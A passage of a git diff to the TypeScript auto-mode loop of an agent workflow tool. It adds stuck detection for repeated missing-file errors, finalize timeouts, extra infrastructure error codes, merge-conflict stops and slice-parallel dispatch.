@@ -1534,9 +1597,7 @@ export { dispatchDirectPhase } from "./auto-direct-dispatch.js";
 
 // Re-export recovery functions for external consumers
 export {
-  resolveExpectedArtifactPath,
-  verifyExpectedArtifact,
-  writeBlockerPlaceholder,
-  skipExecuteTask,
   buildLoopRemediationSteps,
 } from "./auto-recovery.js";
+export { resolveExpectedArtifactPath } from "./auto-artifact-paths.js";
+
diff --git a/src/resources/extensions/gsd/auto/detect-stuck.ts b/src/resources/extensions/gsd/auto/detect-stuck.ts
index 4d6cba5d2..ab28f4850 100644
--- a/src/resources/extensions/gsd/auto/detect-stuck.ts
+++ b/src/resources/extensions/gsd/auto/detect-stuck.ts
@@ -6,6 +6,13 @@
 
 import type { WindowEntry } from "./types.js";
 
+/**
+ * Pattern matching ENOENT errors with a file path.
+ * Matches: "ENOENT: no such file or directory, access '/path/to/file'"
+ * and similar Node.js filesystem error messages.
+ */
+const ENOENT_PATH_RE = /ENOENT[^']*'([^']+)'/;
+
 /**
  * Analyze a sliding window of recent unit dispatches for stuck patterns.
  * Returns a signal with reason if stuck, null otherwise.
@@ -13,6 +20,8 @@ import type { WindowEntry } from "./types.js";
  * Rule 1: Same error string twice in a row → stuck immediately.
  * Rule 2: Same unit key 3+ consecutive times → stuck (preserves prior behavior).
  * Rule 3: Oscillation A→B→A→B in last 4 entries → stuck.
+ * Rule 4: Same ENOENT path in any 2 entries within the window → stuck (#3575).
+ *         Missing files don't self-heal between retries — retrying wastes budget.
  */
 export function detectStuck(
   window: readonly WindowEntry[],
@@ -56,5 +65,23 @@ export function detectStuck(
     }
   }
 
+  // Rule 4: Same ENOENT path seen twice in window (#3575)
+  // Missing files don't appear between retries — stop immediately.
+  const enoentPaths = new Map<string, number>();
+  for (const entry of window) {
+    if (!entry.error) continue;
+    const match = ENOENT_PATH_RE.exec(entry.error);
+    if (!match) continue;
+    const filePath = match[1];
+    const count = (enoentPaths.get(filePath) ?? 0) + 1;
+    if (count >= 2) {
+      return {
+        stuck: true,
+        reason: `Missing file referenced twice: ${filePath} (ENOENT)`,
+      };
+    }
+    enoentPaths.set(filePath, count);
+  }
+
   return null;
 }
diff --git a/src/resources/extensions/gsd/auto/finalize-timeout.ts b/src/resources/extensions/gsd/auto/finalize-timeout.ts
new file mode 100644
index 000000000..f5e073fc9
--- /dev/null
+++ b/src/resources/extensions/gsd/auto/finalize-timeout.ts
@@ -0,0 +1,49 @@
+/**
+ * auto/finalize-timeout.ts — Timeout guard for post-unit finalization.
+ *
+ * Prevents the auto-loop from hanging indefinitely when
+ * postUnitPostVerification() never resolves (#2344).
+ *
+ * Leaf module — no imports from auto/ to avoid circular dependencies.
+ */
+
+/** Timeout for postUnitPreVerification in runFinalize (ms). */
+export const FINALIZE_PRE_TIMEOUT_MS = 60_000;
+
+/** Timeout for postUnitPostVerification in runFinalize (ms). */
+export const FINALIZE_POST_TIMEOUT_MS = 60_000;
+
+/**
+ * Race a promise against a timeout. Returns an object indicating whether
+ * the timeout fired and the resolved value (if any).
+ *
+ * Unlike Promise.race with a rejection, this returns a discriminated
+ * result so callers can handle timeouts as a recoverable condition
+ * rather than an exception.
+ *
+ * The timeout timer is always cleaned up, whether the promise resolves
+ * or the timeout fires.
+ */
+export async function withTimeout<T>(
+  promise: Promise<T>,
+  timeoutMs: number,
+  label: string,
+): Promise<{ value: T; timedOut: false } | { value: undefined; timedOut: true }> {
+  let timeoutHandle: ReturnType<typeof setTimeout> | undefined;
+
+  const timeoutPromise = new Promise<{ value: undefined; timedOut: true }>((resolve) => {
+    timeoutHandle = setTimeout(() => {
+      resolve({ value: undefined, timedOut: true });
+    }, timeoutMs);
+  });
+
+  try {
+    const result = await Promise.race([
+      promise.then((value) => ({ value, timedOut: false as const })),
+      timeoutPromise,
+    ]);
+    return result;
+  } finally {
+    if (timeoutHandle) clearTimeout(timeoutHandle);
+  }
+}
diff --git a/src/resources/extensions/gsd/auto/infra-errors.ts b/src/resources/extensions/gsd/auto/infra-errors.ts
index 92edf26fc..17c1a553d 100644
--- a/src/resources/extensions/gsd/auto/infra-errors.ts
+++ b/src/resources/extensions/gsd/auto/infra-errors.ts
@@ -18,6 +18,10 @@ export const INFRA_ERROR_CODES: ReadonlySet<string> = new Set([
   "EDQUOT",   // disk quota exceeded
   "EMFILE",   // too many open files (process)
   "ENFILE",   // too many open files (system)
+  "EAGAIN",       // resource temporarily unavailable (resource exhaustion)
+  "ECONNREFUSED", // connection refused (offline / local server down)
+  "ENOTFOUND",    // DNS lookup failed (offline / no network)
+  "ENETUNREACH",  // network unreachable (offline / no route)
 ]);
 
 /**
@@ -37,5 +41,8 @@ export function isInfrastructureError(err: unknown): string | null {
   for (const code of INFRA_ERROR_CODES) {
     if (msg.includes(code)) return code;
   }
+  // SQLite WAL corruption is not transient — retrying burns LLM budget
+  // for guaranteed failures (#2823).
+  if (msg.includes("database disk image is malformed")) return "SQLITE_CORRUPT";
   return null;
 }
diff --git a/src/resources/extensions/gsd/auto/loop-deps.ts b/src/resources/extensions/gsd/auto/loop-deps.ts
index 126ed680d..ff63d8a3e 100644
--- a/src/resources/extensions/gsd/auto/loop-deps.ts
+++ b/src/resources/extensions/gsd/auto/loop-deps.ts
@@ -20,6 +20,7 @@ import type { DispatchAction } from "../auto-dispatch.js";
 import type { WorktreeResolver } from "../worktree-resolver.js";
 import type { CmuxLogLevel } from "../../cmux/index.js";
 import type { JournalEntry } from "../journal.js";
+import type { MergeReconcileResult } from "../auto-recovery.js";
 
 /**
  * Dependencies injected by the caller (auto.ts startAuto) so autoLoop
@@ -80,7 +81,6 @@ export interface LoopDeps {
     basePath: string,
     unitType: string,
     unitId: string,
-    completedUnits: number,
     sessionFile?: string,
   ) => void;
   handleLostSessionLock: (
@@ -94,6 +94,7 @@ export interface LoopDeps {
     body: string,
     kind: string,
     category: string,
+    projectName?: string,
   ) => void;
   setActiveMilestoneId: (basePath: string, mid: string) => void;
   pruneQueueOrder: (basePath: string, pendingIds: string[]) => void;
@@ -109,7 +110,6 @@ export interface LoopDeps {
   captureIntegrationBranch: (
     basePath: string,
     mid: string,
-    opts?: { commitDocs?: boolean },
   ) => void;
   getIsolationMode: () => string;
   getCurrentBranch: (basePath: string) => string;
@@ -119,7 +119,7 @@ export interface LoopDeps {
     milestoneId: string,
     fileType: string,
   ) => string | null;
-  reconcileMergeState: (basePath: string, ctx: ExtensionContext) => boolean;
+  reconcileMergeState: (basePath: string, ctx: ExtensionContext) => MergeReconcileResult;
 
   // Budget/context/secrets
   getLedger: () => unknown;
@@ -171,14 +171,6 @@ export interface LoopDeps {
     unitId: string,
   ) => string | null;
   getMainBranch: (basePath: string) => string;
-  collectObservabilityWarnings: (
-    ctx: ExtensionContext,
-    basePath: string,
-    unitType: string,
-    unitId: string,
-  ) => Promise<unknown[]>;
-  buildObservabilityRepairBlock: (issues: unknown[]) => string | null;
-
   // Unit closeout + runtime records
   closeoutUnit: (
     ctx: ExtensionContext,
@@ -188,29 +180,11 @@ export interface LoopDeps {
     startedAt: number,
     opts?: CloseoutOptions & Record<string, unknown>,
   ) => Promise<void>;
-  verifyExpectedArtifact: (
-    unitType: string,
-    unitId: string,
-    basePath: string,
-  ) => boolean;
-  clearUnitRuntimeRecord: (
-    basePath: string,
-    unitType: string,
-    unitId: string,
-  ) => void;
-  writeUnitRuntimeRecord: (
-    basePath: string,
-    unitType: string,
-    unitId: string,
-    startedAt: number,
-    record: Record<string, unknown>,
-  ) => void;
   recordOutcome: (unitType: string, tier: string, success: boolean) => void;
   writeLock: (
     lockBase: string,
     unitType: string,
     unitId: string,
-    completedCount: number,
     sessionFile?: string,
   ) => void;
   captureAvailableSkills: () => void;
@@ -237,7 +211,10 @@ export interface LoopDeps {
     verbose: boolean,
     startModel: { provider: string; id: string } | null,
     retryContext?: { isRetry: boolean; previousTier?: string },
-  ) => Promise<{ routing: { tier: string; modelDowngraded: boolean } | null }>;
+  ) => Promise<{
+    routing: { tier: string; modelDowngraded: boolean } | null;
+    appliedModel: { provider: string; id: string } | null;
+  }>;
   resolveModelId: <T extends { id: string; provider: string }>(
     modelId: string,
     availableModels: T[],
diff --git a/src/resources/extensions/gsd/auto/loop.ts b/src/resources/extensions/gsd/auto/loop.ts
index 38b5ca2a9..3a0c8de10 100644
--- a/src/resources/extensions/gsd/auto/loop.ts
+++ b/src/resources/extensions/gsd/auto/loop.ts
@@ -46,8 +46,9 @@ export async function autoLoop(
 ): Promise<void> {
   debugLog("autoLoop", { phase: "enter" });
   let iteration = 0;
-  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0 };
+  const loopState: LoopState = { recentUnits: [], stuckRecoveryAttempts: 0, consecutiveFinalizeTimeouts: 0 };
   let consecutiveErrors = 0;
+  const recentErrorMessages: string[] = [];
 
   while (s.active) {
     iteration++;
@@ -161,7 +162,6 @@ export async function autoLoop(
           prompt: step.prompt,
           finalPrompt: step.prompt,
           pauseAfterUatDispatch: false,
-          observabilityIssues: [],
           state: gsdState,
           mid: s.currentMilestoneId ?? "workflow",
           midTitle: "Workflow",
@@ -194,7 +194,7 @@ export async function autoLoop(
 
         // Verification passed — mark step complete
         debugLog("autoLoop", { phase: "custom-engine-reconcile", iteration, unitId: iterData.unitId });
-        await engine.reconcile(engineState, {
+        const reconcileResult = await engine.reconcile(engineState, {
           unitType: iterData.unitType,
           unitId: iterData.unitId,
           startedAt: s.currentUnit?.startedAt ?? Date.now(),
@@ -203,8 +203,22 @@ export async function autoLoop(
 
         deps.clearUnitTimeout();
         consecutiveErrors = 0;
+        recentErrorMessages.length = 0;
         deps.emitJournalEvent({ ts: new Date().toISOString(), flowId, seq: nextSeq(), eventType: "iteration-end", data: { iteration } });
         debugLog("autoLoop", { phase: "iteration-complete", iteration });
+
+        if (reconcileResult.outcome === "milestone-complete") {
+          await deps.stopAuto(ctx, pi, "Workflow complete");
+          break;
+        }
+        if (reconcileResult.outcome === "pause") {
+          await deps.pauseAuto(ctx, pi);
+          break;
+        }
+        if (reconcileResult.outcome === "stop") {
+          await deps.stopAuto(ctx, pi, reconcileResult.reason ?? "Engine stopped");
+          break;
+        }
         continue;
       }
 
@@ -234,7 +248,6 @@ export async function autoLoop(
           prompt: sidecarItem.prompt,
           finalPrompt: sidecarItem.prompt,
           pauseAfterUatDispatch: false,
-          observabilityIssues: [],
           state: sidecarState,
           mid: sidecarState.activeMilestone?.id,
           midTitle: sidecarState.activeMilestone?.title,
@@ -247,17 +260,23 @@ export async function autoLoop(
 
       // ── Phase 5: Finalize ───────────────────────────────────────────────
 
-      const finalizeResult = await runFinalize(ic, iterData, sidecarItem);
+      const finalizeResult = await runFinalize(ic, iterData, loopState, sidecarItem);
       if (finalizeResult.action === "break") break;
       if (finalizeResult.action === "continue") continue;
 
       consecutiveErrors = 0; // Iteration completed successfully
+      recentErrorMessages.length = 0;
       deps.emitJournalEvent({ ts: new Date().toISOString(), flowId, seq: nextSeq(), eventType: "iteration-end", data: { iteration } });
       debugLog("autoLoop", { phase: "iteration-complete", iteration });
     } catch (loopErr) {
       // ── Blanket catch: absorb unexpected exceptions, apply graduated recovery ──
       const msg = loopErr instanceof Error ? loopErr.message : String(loopErr);
 
+      // Always emit iteration-end on error so the journal records iteration
+      // completion even on failure (#2344). Without this, errors in
+      // runFinalize leave the journal incomplete, making diagnosis harder.
+      deps.emitJournalEvent({ ts: new Date().toISOString(), flowId, seq: nextSeq(), eventType: "iteration-end", data: { iteration, error: msg } });
+
       // ── Infrastructure errors: immediate stop, no retry ──
       // These are unrecoverable (disk full, OOM, etc.). Retrying just burns
       // LLM budget on guaranteed failures.
@@ -282,6 +301,7 @@ export async function autoLoop(
       }
 
       consecutiveErrors++;
+      recentErrorMessages.push(msg.length > 120 ? msg.slice(0, 120) + "..." : msg);
       debugLog("autoLoop", {
         phase: "iteration-error",
         iteration,
@@ -291,8 +311,11 @@ export async function autoLoop(
 
       if (consecutiveErrors >= 3) {
         // 3+ consecutive: hard stop — something is fundamentally broken
+        const errorHistory = recentErrorMessages
+          .map((m, i) => `  ${i + 1}. ${m}`)
+          .join("\n");
         ctx.ui.notify(
-          `Auto-mode stopped: ${consecutiveErrors} consecutive iteration failures. Last: ${msg}`,
+          `Auto-mode stopped: ${consecutiveErrors} consecutive iteration failures:\n${errorHistory}`,
           "error",
         );
         await deps.stopAuto(
diff --git a/src/resources/extensions/gsd/auto/phases.ts b/src/resources/extensions/gsd/auto/phases.ts
index 097bb26ef..d313053fe 100644
--- a/src/resources/extensions/gsd/auto/phases.ts
+++ b/src/resources/extensions/gsd/auto/phases.ts
@@ -15,6 +15,7 @@ import type { PostUnitContext, PreVerificationOpts } from "../auto-post-unit.js"
 import {
   MAX_RECOVERY_CHARS,
   BUDGET_THRESHOLDS,
+  MAX_FINALIZE_TIMEOUTS,
   type PhaseResult,
   type IterationContext,
   type LoopState,
@@ -24,13 +25,45 @@ import {
 import { detectStuck } from "./detect-stuck.js";
 import { runUnit } from "./run-unit.js";
 import { debugLog } from "../debug-logger.js";
+import { PROJECT_FILES } from "../detection.js";
+import { MergeConflictError } from "../git-service.js";
+import { join, basename, dirname, parse as parsePath } from "node:path";
+import { existsSync, cpSync, readdirSync } from "node:fs";
+import { logWarning, logError } from "../workflow-logger.js";
 import { gsdRoot } from "../paths.js";
 import { atomicWriteSync } from "../atomic-write.js";
-import { PROJECT_FILES } from "../detection.js";
-import { join } from "node:path";
+import { verifyExpectedArtifact, diagnoseExpectedArtifact, buildLoopRemediationSteps } from "../auto-recovery.js";
+import { writeUnitRuntimeRecord } from "../unit-runtime.js";
+import { withTimeout, FINALIZE_PRE_TIMEOUT_MS, FINALIZE_POST_TIMEOUT_MS } from "./finalize-timeout.js";
+import { getEligibleSlices } from "../slice-parallel-eligibility.js";
+import { startSliceParallel } from "../slice-parallel-orchestrator.js";
+import { isDbAvailable, getMilestoneSlices } from "../gsd-db.js";
+import { resetEvidence } from "../safety/evidence-collector.js";
+import { createCheckpoint, cleanupCheckpoint, rollbackToCheckpoint } from "../safety/git-checkpoint.js";
+import { resolveSafetyHarnessConfig } from "../safety/safety-harness.js";
 
 // ─── generateMilestoneReport ──────────────────────────────────────────────────
 
+/**
+ * Resolve the base path for milestone reports.
+ * Prefers originalBasePath (project root) over basePath (which may be a worktree).
+ * Exported for testing as _resolveReportBasePath.
+ */
+export function _resolveReportBasePath(s: Pick<AutoSession, "originalBasePath" | "basePath">): string {
+  return s.originalBasePath || s.basePath;
+}
+
+/**
+ * Resolve the authoritative project base for dispatch guards.
+ * Prior-milestone completion lives at the project root, even when the active
+ * unit is running inside an auto worktree.
+ */
+export function _resolveDispatchGuardBasePath(
+  s: Pick<AutoSession, "originalBasePath" | "basePath">,
+): string {
+  return s.originalBasePath || s.basePath;
+}
+
 /**
  * Generate and write an HTML milestone report snapshot.
  * Extracted from the milestone-transition block in autoLoop.
@@ -45,13 +78,15 @@ async function generateMilestoneReport(
   const { writeReportSnapshot } = await importExtensionModule<typeof import("../reports.js")>(import.meta.url, "../reports.js");
   const { basename } = await import("node:path");
 
-  const snapData = await loadVisualizerData(s.basePath);
+  const reportBasePath = _resolveReportBasePath(s);
+
+  const snapData = await loadVisualizerData(reportBasePath);
   const completedMs = snapData.milestones.find(
     (m: { id: string }) => m.id === milestoneId,
   );
   const msTitle = completedMs?.title ?? milestoneId;
   const gsdVersion = process.env.GSD_VERSION ?? "0.0.0";
-  const projName = basename(s.basePath);
+  const projName = basename(reportBasePath);
   const doneSlices = snapData.milestones.reduce(
     (acc: number, m: { slices: { done: boolean }[] }) =>
       acc + m.slices.filter((sl: { done: boolean }) => sl.done).length,
@@ -62,10 +97,10 @@ async function generateMilestoneReport(
     0,
   );
   const outPath = writeReportSnapshot({
-    basePath: s.basePath,
+    basePath: reportBasePath,
     html: generateHtmlReport(snapData, {
       projectName: projName,
-      projectPath: s.basePath,
+      projectPath: reportBasePath,
       gsdVersion,
       milestoneId,
       indexRelPath: "index.html",
@@ -74,7 +109,7 @@ async function generateMilestoneReport(
     milestoneTitle: msTitle,
     kind: "milestone",
     projectName: projName,
-    projectPath: s.basePath,
+    projectPath: reportBasePath,
     gsdVersion,
     totalCost: snapData.totals?.cost ?? 0,
     totalTokens: snapData.totals?.tokens.total ?? 0,
@@ -155,15 +190,15 @@ export async function runPreDispatch(
     }
     if (!healthGate.proceed) {
       ctx.ui.notify(
-        healthGate.reason ?? "Pre-dispatch health check failed.",
+        healthGate.reason || "Pre-dispatch health check failed — run /gsd doctor for details.",
         "error",
       );
       await deps.pauseAuto(ctx, pi);
       debugLog("autoLoop", { phase: "exit", reason: "health-gate-failed" });
       return { action: "break", reason: "health-gate-failed" };
     }
-  } catch {
-    // Non-fatal
+  } catch (e) {
+    logWarning("engine", "Pre-dispatch health gate threw unexpectedly", { error: String(e) });
   }
 
   // Sync project root artifacts into worktree
@@ -191,6 +226,63 @@ export async function runPreDispatch(
     statePhase: state.phase,
   });
 
+  // ── Slice-level parallelism gate (#2340) ─────────────────────────────
+  // When slice_parallel is enabled, check if multiple slices are eligible
+  // for parallel execution. If so, dispatch them in parallel and stop the
+  // sequential loop. Workers are spawned via slice-parallel-orchestrator.ts.
+  if (
+    prefs?.slice_parallel?.enabled &&
+    mid &&
+    !process.env.GSD_PARALLEL_WORKER &&
+    isDbAvailable()
+  ) {
+    try {
+      const dbSlices = getMilestoneSlices(mid);
+      if (dbSlices.length > 0) {
+        const doneIds = new Set(dbSlices.filter(sl => sl.status === "complete" || sl.status === "done").map(sl => sl.id));
+        const sliceInputs = dbSlices.map(sl => ({
+          id: sl.id,
+          done: doneIds.has(sl.id),
+          depends: sl.depends ?? [],
+        }));
+        const eligible = getEligibleSlices(sliceInputs, doneIds);
+        if (eligible.length > 1) {
+          debugLog("autoLoop", {
+            phase: "slice-parallel-dispatch",
+            iteration: ic.iteration,
+            mid,
+            eligibleSlices: eligible.map(e => e.id),
+          });
+          ctx.ui.notify(
+            `Slice-parallel: dispatching ${eligible.length} eligible slices for ${mid}.`,
+            "info",
+          );
+          const result = await startSliceParallel(
+            s.basePath,
+            mid,
+            eligible,
+            { maxWorkers: prefs.slice_parallel.max_workers ?? 2 },
+          );
+          if (result.started.length > 0) {
+            ctx.ui.notify(
+              `Slice-parallel: started ${result.started.length} worker(s): ${result.started.join(", ")}.`,
+              "info",
+            );
+            await deps.stopAuto(ctx, pi, `Slice-parallel dispatched for ${mid}`);
+            return { action: "break", reason: "slice-parallel-dispatched" };
+          }
+          // Fall through to sequential if no workers started
+        }
+      }
+    } catch (err) {
+      debugLog("autoLoop", {
+        phase: "slice-parallel-check-error",
+        error: err instanceof Error ? err.message : String(err),
+      });
+      // Non-fatal — fall through to sequential dispatch
+    }
+  }
+
   // ── Milestone transition ────────────────────────────────────────────
   if (mid && s.currentMilestoneId && mid !== s.currentMilestoneId) {
     deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: ic.nextSeq(), eventType: "milestone-transition", data: { from: s.currentMilestoneId, to: mid } });
@@ -203,6 +295,7 @@ export async function runPreDispatch(
       `Milestone ${s.currentMilestoneId} complete!`,
       "success",
       "milestone",
+      basename(s.originalBasePath || s.basePath),
     );
     deps.logCmuxEvent(
       prefs,
@@ -233,26 +326,30 @@ export async function runPreDispatch(
     loopState.stuckRecoveryAttempts = 0;
 
     // Worktree lifecycle on milestone transition — merge current, enter next
-    deps.resolver.mergeAndExit(s.currentMilestoneId!, ctx.ui);
-
-    // Opt-in: create draft PR on milestone completion
-    if (prefs?.git?.auto_pr) {
-      try {
-        const { createDraftPR } = await import("../git-service.js");
-        const prUrl = createDraftPR(
-          s.basePath,
-          s.currentMilestoneId!,
-          `[GSD] ${s.currentMilestoneId} complete`,
-          `Milestone ${s.currentMilestoneId} completed by GSD auto-mode.\n\nSee .gsd/${s.currentMilestoneId}/ for details.`,
+    try {
+      deps.resolver.mergeAndExit(s.currentMilestoneId!, ctx.ui);
+    } catch (mergeErr) {
+      if (mergeErr instanceof MergeConflictError) {
+        // Real code conflicts — stop the loop instead of retrying forever (#2330)
+        ctx.ui.notify(
+          `Merge conflict: ${mergeErr.conflictedFiles.join(", ")}. Resolve conflicts manually and run /gsd auto to resume.`,
+          "error",
         );
-        if (prUrl) {
-          ctx.ui.notify(`Draft PR created: ${prUrl}`, "info");
-        }
-      } catch {
-        // Non-fatal — PR creation is best-effort
+        await deps.stopAuto(ctx, pi, `Merge conflict on milestone ${s.currentMilestoneId}`);
+        return { action: "break", reason: "merge-conflict" };
       }
+      // Non-conflict merge errors — stop auto to avoid advancing with unmerged work
+      logError("engine", "Milestone merge failed with non-conflict error", { milestone: s.currentMilestoneId!, error: String(mergeErr) });
+      ctx.ui.notify(
+        `Merge failed: ${mergeErr instanceof Error ? mergeErr.message : String(mergeErr)}. Resolve and run /gsd auto to resume.`,
+        "error",
+      );
+      await deps.stopAuto(ctx, pi, `Merge error on milestone ${s.currentMilestoneId}: ${String(mergeErr)}`);
+      return { action: "break", reason: "merge-failed" };
     }
 
+    // PR creation (auto_pr) is handled inside mergeMilestoneToMain (#2302)
+
     deps.invalidateAllCaches();
 
     state = await deps.deriveState(s.basePath);
@@ -261,9 +358,7 @@ export async function runPreDispatch(
 
     if (mid) {
       if (deps.getIsolationMode() !== "none") {
-        deps.captureIntegrationBranch(s.basePath, mid, {
-          commitDocs: prefs?.git?.commit_docs,
-        });
+        deps.captureIntegrationBranch(s.basePath, mid);
       }
       deps.resolver.enterMilestone(mid, ctx.ui);
     } else {
@@ -278,14 +373,20 @@ export async function runPreDispatch(
       .map((m: { id: string }) => m.id);
     deps.pruneQueueOrder(s.basePath, pendingIds);
 
-    // Reset completed-units tracking for the new milestone — stale entries
-    // from the previous milestone cause the dispatch loop to skip units
-    // that haven't actually been completed in the new milestone's context.
-    s.completedUnits = [];
+    // Archive the old completed-units.json instead of wiping it (#2313).
     try {
       const completedKeysPath = join(gsdRoot(s.basePath), "completed-units.json");
+      if (existsSync(completedKeysPath) && s.currentMilestoneId) {
+        const archivePath = join(
+          gsdRoot(s.basePath),
+          `completed-units-${s.currentMilestoneId}.json`,
+        );
+        cpSync(completedKeysPath, archivePath);
+      }
       atomicWriteSync(completedKeysPath, JSON.stringify([], null, 2));
-    } catch { /* non-fatal */ }
+    } catch (e) {
+      logWarning("engine", "Failed to archive completed-units on milestone transition", { error: String(e) });
+    }
 
     // Rebuild STATE.md immediately so it reflects the new active milestone.
     // This bypasses the 30-second throttle in the normal rebuild path —
@@ -293,8 +394,8 @@ export async function runPreDispatch(
     // immediate write.
     try {
       await deps.rebuildState(s.basePath);
-    } catch {
-      // Non-fatal — STATE.md will be rebuilt on the next regular cycle
+    } catch (e) {
+      logWarning("engine", "STATE.md rebuild failed after milestone transition", { error: String(e) });
     }
   }
 
@@ -324,31 +425,36 @@ export async function runPreDispatch(
     if (incomplete.length === 0 && state.registry.length > 0) {
       // All milestones complete — merge milestone branch before stopping
       if (s.currentMilestoneId) {
-        deps.resolver.mergeAndExit(s.currentMilestoneId, ctx.ui);
-
-        // Opt-in: create draft PR on milestone completion
-        if (prefs?.git?.auto_pr) {
-          try {
-            const { createDraftPR } = await import("../git-service.js");
-            const prUrl = createDraftPR(
-              s.basePath,
-              s.currentMilestoneId,
-              `[GSD] ${s.currentMilestoneId} complete`,
-              `Milestone ${s.currentMilestoneId} completed by GSD auto-mode.\n\nSee .gsd/${s.currentMilestoneId}/ for details.`,
+        try {
+          deps.resolver.mergeAndExit(s.currentMilestoneId, ctx.ui);
+          // Prevent stopAuto from attempting the same merge (#2645)
+          s.milestoneMergedInPhases = true;
+        } catch (mergeErr) {
+          if (mergeErr instanceof MergeConflictError) {
+            ctx.ui.notify(
+              `Merge conflict: ${mergeErr.conflictedFiles.join(", ")}. Resolve conflicts manually and run /gsd auto to resume.`,
+              "error",
             );
-            if (prUrl) {
-              ctx.ui.notify(`Draft PR created: ${prUrl}`, "info");
-            }
-          } catch {
-            // Non-fatal — PR creation is best-effort
+            await deps.stopAuto(ctx, pi, `Merge conflict on milestone ${s.currentMilestoneId}`);
+            return { action: "break", reason: "merge-conflict" };
           }
+          logError("engine", "Milestone merge failed with non-conflict error", { milestone: s.currentMilestoneId!, error: String(mergeErr) });
+          ctx.ui.notify(
+            `Merge failed: ${mergeErr instanceof Error ? mergeErr.message : String(mergeErr)}. Resolve and run /gsd auto to resume.`,
+            "error",
+          );
+          await deps.stopAuto(ctx, pi, `Merge error on milestone ${s.currentMilestoneId}: ${String(mergeErr)}`);
+          return { action: "break", reason: "merge-failed" };
         }
+
+        // PR creation (auto_pr) is handled inside mergeMilestoneToMain (#2302)
       }
       deps.sendDesktopNotification(
         "GSD",
         "All milestones complete!",
         "success",
         "milestone",
+        basename(s.originalBasePath || s.basePath),
       );
       deps.logCmuxEvent(
         prefs,
@@ -372,7 +478,7 @@ export async function runPreDispatch(
       const blockerMsg = `Blocked: ${state.blockers.join(", ")}`;
       await deps.stopAuto(ctx, pi, blockerMsg);
       ctx.ui.notify(`${blockerMsg}. Fix and run /gsd auto.`, "warning");
-      deps.sendDesktopNotification("GSD", blockerMsg, "error", "attention");
+      deps.sendDesktopNotification("GSD", blockerMsg, "error", "attention", basename(s.originalBasePath || s.basePath));
       deps.logCmuxEvent(prefs, blockerMsg, "error");
     } else {
       const ids = incomplete.map((m: { id: string }) => m.id).join(", ");
@@ -401,7 +507,13 @@ export async function runPreDispatch(
   }
 
   // Mid-merge safety check
-  if (deps.reconcileMergeState(s.basePath, ctx)) {
+  const mergeReconcileResult = deps.reconcileMergeState(s.basePath, ctx);
+  if (mergeReconcileResult === "blocked") {
+    await deps.pauseAuto(ctx, pi);
+    debugLog("autoLoop", { phase: "exit", reason: "merge-reconciliation-blocked" });
+    return { action: "break", reason: "merge-reconciliation-blocked" };
+  }
+  if (mergeReconcileResult === "reconciled") {
     deps.invalidateAllCaches();
     state = await deps.deriveState(s.basePath);
     mid = state.activeMilestone?.id;
@@ -424,31 +536,36 @@ export async function runPreDispatch(
   if (state.phase === "complete") {
     // Milestone merge on complete (before closeout so branch state is clean)
     if (s.currentMilestoneId) {
-      deps.resolver.mergeAndExit(s.currentMilestoneId, ctx.ui);
-
-      // Opt-in: create draft PR on milestone completion
-      if (prefs?.git?.auto_pr) {
-        try {
-          const { createDraftPR } = await import("../git-service.js");
-          const prUrl = createDraftPR(
-            s.basePath,
-            s.currentMilestoneId,
-            `[GSD] ${s.currentMilestoneId} complete`,
-            `Milestone ${s.currentMilestoneId} completed by GSD auto-mode.\n\nSee .gsd/${s.currentMilestoneId}/ for details.`,
+      try {
+        deps.resolver.mergeAndExit(s.currentMilestoneId, ctx.ui);
+        // Prevent stopAuto from attempting the same merge (#2645)
+        s.milestoneMergedInPhases = true;
+      } catch (mergeErr) {
+        if (mergeErr instanceof MergeConflictError) {
+          ctx.ui.notify(
+            `Merge conflict: ${mergeErr.conflictedFiles.join(", ")}. Resolve conflicts manually and run /gsd auto to resume.`,
+            "error",
           );
-          if (prUrl) {
-            ctx.ui.notify(`Draft PR created: ${prUrl}`, "info");
-          }
-        } catch {
-          // Non-fatal — PR creation is best-effort
+          await deps.stopAuto(ctx, pi, `Merge conflict on milestone ${s.currentMilestoneId}`);
+          return { action: "break", reason: "merge-conflict" };
         }
+        logError("engine", "Milestone merge failed with non-conflict error", { milestone: s.currentMilestoneId!, error: String(mergeErr) });
+        ctx.ui.notify(
+          `Merge failed: ${mergeErr instanceof Error ? mergeErr.message : String(mergeErr)}. Resolve and run /gsd auto to resume.`,
+          "error",
+        );
+        await deps.stopAuto(ctx, pi, `Merge error on milestone ${s.currentMilestoneId}: ${String(mergeErr)}`);
+        return { action: "break", reason: "merge-failed" };
       }
+
+      // PR creation (auto_pr) is handled inside mergeMilestoneToMain (#2302)
     }
     deps.sendDesktopNotification(
       "GSD",
       `Milestone ${mid} complete!`,
       "success",
       "milestone",
+      basename(s.originalBasePath || s.basePath),
     );
     deps.logCmuxEvent(
       prefs,
@@ -466,7 +583,7 @@ export async function runPreDispatch(
     const blockerMsg = `Blocked: ${state.blockers.join(", ")}`;
     await closeoutAndStop(ctx, pi, s, deps, blockerMsg);
     ctx.ui.notify(`${blockerMsg}. Fix and run /gsd auto.`, "warning");
-    deps.sendDesktopNotification("GSD", blockerMsg, "error", "attention");
+    deps.sendDesktopNotification("GSD", blockerMsg, "error", "attention", basename(s.originalBasePath || s.basePath));
     deps.logCmuxEvent(prefs, blockerMsg, "error");
     debugLog("autoLoop", { phase: "exit", reason: "blocked" });
     deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: ic.nextSeq(), eventType: "terminal", data: { reason: "blocked", blockers: state.blockers } });
@@ -503,7 +620,17 @@ export async function runDispatch(
 
   if (dispatchResult.action === "stop") {
     deps.emitJournalEvent({ ts: new Date().toISOString(), flowId: ic.flowId, seq: ic.nextSeq(), eventType: "dispatch-stop", rule: dispatchResult.matchedRule, data: { reason: dispatchResult.reason } });
-    await closeoutAndStop(ctx, pi, s, deps, dispatchResult.reason);
+    // Warning-level stops are recoverable human checkpoints (e.g. UAT verdict
+    // gate) — pause instead of hard-stopping so the session is resumable with
+    // `/gsd auto`. Error/info-level stops remain hard stops for infrastructure
+    // failures and terminal conditions respectively.
+    // See: https://github.com/gsd-build/gsd-2/issues/2474
+    if (dispatchResult.level === "warning") {
+      ctx.ui.notify(dispatchResult.reason, "warning");
+      await deps.pauseAuto(ctx, pi);
+    } else {
+      await closeoutAndStop(ctx, pi, s, deps, dispatchResult.reason);
+    }
     debugLog("autoLoop", { phase: "exit", reason: "dispatch-stop" });
     return { action: "break", reason: "dispatch-stop" };
   }
@@ -541,7 +668,7 @@ export async function runDispatch(
